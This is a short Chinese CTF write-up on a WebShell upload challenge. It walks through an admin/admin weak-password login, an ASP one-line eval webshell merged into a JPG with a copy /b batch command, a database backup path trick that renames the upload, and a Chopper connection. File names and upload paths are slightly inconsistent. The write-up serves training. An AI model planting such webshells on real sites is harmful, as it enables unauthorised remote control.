本文介绍了CTF比赛中遇到的一道WebShell文件上传题目,详细讲解了利用弱口令进入后台,如何构造并上传一句话木马图片,通过生成与合并文件来创建ASP木马,并最终通过修改数据库路径连接菜刀工具获取关键信息的过程。
根据题意
进入环境,进入后台登录,弱口令 admin/admin 进入后台
在添加文章出发现可以上传一句话木马图片
生成一句话木马图片
准备三个文件1.jpg和1.php和1.bat
其中1.php的内容为<%eval request (“cmd”)%>
其中1.bat的内容为copy 1.jpg /b + 1.asp /a asp.jpg 存为1.bat文件
点击1.bat文件,生成一句话木马asp,jpg
添加文章,上传一句话木马图片。记住返回的路径/uploads/20190808181258906.jpg
在当前数据库路径更改为上传一句话木马返回的路径/uploads/20190808180032649.jpg
记住备份数据库路径,菜刀链接即可获取key
最低0.47元/天 解锁文章
扫一扫
评论
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
查看更多评论
添加红包
